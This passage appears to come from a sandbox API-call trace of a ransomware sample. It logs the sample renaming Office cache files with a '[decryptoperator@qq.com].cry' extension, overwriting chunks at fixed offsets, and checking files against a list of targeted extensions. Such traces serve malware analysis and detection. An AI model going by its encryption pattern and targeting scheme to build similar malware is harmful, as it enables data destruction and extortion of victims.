(in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f30090 | out: hHeap=0x600000) returned 1 [0036.557] CloseHandle (hObject=0x16c) returned 1 [0037.199] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.199] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.199] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.199] lstrlenW (lpString=".doc") returned 4 [0037.200] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.200] lstrlenW (lpString=".docx") returned 5 [0037.200] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.200] lstrlenW (lpString=".pdf") returned 4 [0037.200] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.200] lstrlenW (lpString=".xls") returned 4 [0037.200] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.200] lstrlenW (lpString=".xlsx") returned 5 [0037.200] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.200] lstrlenW (lpString=".ppt") returned 4 [0037.200] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.200] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.200] lstrlenW (lpString=".zip") returned 4 [0037.200] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.200] lstrlenW (lpString=".rar") returned 4 [0037.200] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.200] lstrlenW (lpString=".bz2") returned 4 [0037.200] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.200] lstrlenW (lpString=".7z") returned 3 [0037.200] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.200] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.200] lstrlenW (lpString=".dbf") returned 4 [0037.200] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.200] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.200] lstrlenW (lpString=".1cd") returned 4 [0037.200] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.200] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.200] lstrlenW (lpString=".jpg") returned 4 [0037.200] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.201] lstrlenW (lpString=".doc") returned 4 [0037.201] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.201] lstrlenW (lpString=".docx") returned 5 [0037.201] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.201] lstrlenW (lpString=".pdf") returned 4 [0037.201] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.201] lstrlenW (lpString=".xls") returned 4 [0037.201] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.201] lstrlenW (lpString=".xlsx") returned 5 [0037.201] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.201] lstrlenW (lpString=".ppt") returned 4 [0037.201] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.201] lstrlenW (lpString=".zip") returned 4 [0037.201] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.201] lstrlenW (lpString=".rar") returned 4 [0037.201] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.201] lstrlenW (lpString=".bz2") returned 4 [0037.201] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.201] lstrlenW (lpString=".7z") returned 3 [0037.201] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.201] lstrlenW (lpString=".dbf") returned 4 [0037.201] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.201] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.201] lstrlenW (lpString=".1cd") returned 4 [0037.202] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.202] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0037.202] lstrlenW (lpString=".jpg") returned 4 [0037.202] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.202] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0037.202] lstrlenW (lpString="PubLR.cab") returned 9 [0037.202] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0037.202] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=9958388) returned 1 [0037.202] CloseHandle (hObject=0x16c) returned 1 [0037.202] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0037.202] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.202] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0037.203] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0037.204] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.204] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.204] ReadFile (in: hFile=0x16c, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.403] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.403] ReadFile (in: hFile=0x16c, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.506] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.506] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.506] ReadFile (in: hFile=0x16c, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.537] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.537] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0037.555] SetEndOfFile (hFile=0x16c) returned 1 [0037.555] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f74098 [0037.663] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.663] WriteFile (in: hFile=0x16c, lpBuffer=0x3f74098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f74098*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.664] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.664] WriteFile (in: hFile=0x16c, lpBuffer=0x3f74098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f74098*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.670] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.670] WriteFile (in: hFile=0x16c, lpBuffer=0x3f74098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f74098*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.674] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f74098 | out: hHeap=0x600000) returned 1 [0037.677] CloseHandle (hObject=0x16c) returned 1 [0039.992] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString=".doc") returned 4 [0039.993] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString=".docx") returned 5 [0039.993] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.993] lstrlenW (lpString=".pdf") returned 4 [0039.993] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString=".xls") returned 4 [0039.993] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString=".xlsx") returned 5 [0039.993] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.993] lstrlenW (lpString=".ppt") returned 4 [0039.993] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString=".zip") returned 4 [0039.993] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString=".rar") returned 4 [0039.993] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString=".bz2") returned 4 [0039.993] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.993] lstrlenW (lpString=".7z") returned 3 [0039.993] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString=".dbf") returned 4 [0039.993] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString=".1cd") returned 4 [0039.993] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString=".jpg") returned 4 [0039.993] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.993] lstrlenW (lpString=".doc") returned 4 [0039.994] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString=".docx") returned 5 [0039.994] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.994] lstrlenW (lpString=".pdf") returned 4 [0039.994] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString=".xls") returned 4 [0039.994] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString=".xlsx") returned 5 [0039.994] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.994] lstrlenW (lpString=".ppt") returned 4 [0039.994] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.994] lstrlenW (lpString=".zip") returned 4 [0039.994] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString=".rar") returned 4 [0039.994] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString=".bz2") returned 4 [0039.994] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.994] lstrlenW (lpString=".7z") returned 3 [0039.994] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.994] lstrlenW (lpString=".dbf") returned 4 [0039.994] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.994] lstrlenW (lpString=".1cd") returned 4 [0039.994] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 72 [0039.994] lstrlenW (lpString=".jpg") returned 4 [0039.994] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.994] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0039.994] lstrlenW (lpString="Proof.cab") returned 9 [0039.994] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0039.995] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=11482605) returned 1 [0039.995] CloseHandle (hObject=0x16c) returned 1 [0039.995] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020 [0039.995] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.995] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0040.610] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0040.610] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0040.610] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.610] ReadFile (in: hFile=0x16c, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.128] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.128] ReadFile (in: hFile=0x16c, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.185] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.185] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.185] ReadFile (in: hFile=0x16c, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.261] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.261] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.580] SetEndOfFile (hFile=0x16c) returned 1 [0041.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0041.584] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.584] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.585] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.585] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.587] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.587] WriteFile (in: hFile=0x16c, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.589] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0041.589] CloseHandle (hObject=0x16c) returned 1 [0043.468] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0043.501] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.501] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.501] lstrlenW (lpString=".doc") returned 4 [0043.501] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.501] lstrlenW (lpString=".docx") returned 5 [0043.501] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0043.501] lstrlenW (lpString=".pdf") returned 4 [0043.501] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.501] lstrlenW (lpString=".xls") returned 4 [0043.501] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.501] lstrlenW (lpString=".xlsx") returned 5 [0043.501] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0043.501] lstrlenW (lpString=".ppt") returned 4 [0043.501] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.501] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.501] lstrlenW (lpString=".zip") returned 4 [0043.502] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString=".rar") returned 4 [0043.502] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString=".bz2") returned 4 [0043.502] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.502] lstrlenW (lpString=".7z") returned 3 [0043.502] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.502] lstrlenW (lpString=".dbf") returned 4 [0043.502] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.502] lstrlenW (lpString=".1cd") returned 4 [0043.502] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.502] lstrlenW (lpString=".jpg") returned 4 [0043.502] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.502] lstrlenW (lpString=".doc") returned 4 [0043.502] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString=".docx") returned 5 [0043.502] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0043.502] lstrlenW (lpString=".pdf") returned 4 [0043.502] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString=".xls") returned 4 [0043.502] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString=".xlsx") returned 5 [0043.502] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0043.502] lstrlenW (lpString=".ppt") returned 4 [0043.502] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.502] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.502] lstrlenW (lpString=".zip") returned 4 [0043.503] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.503] lstrlenW (lpString=".rar") returned 4 [0043.503] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.503] lstrlenW (lpString=".bz2") returned 4 [0043.503] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.503] lstrlenW (lpString=".7z") returned 3 [0043.503] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.503] lstrlenW (lpString=".dbf") returned 4 [0043.503] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.503] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0043.503] lstrlenW (lpString=".1cd") returned 4 [0043.503] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.503] lstrlenW 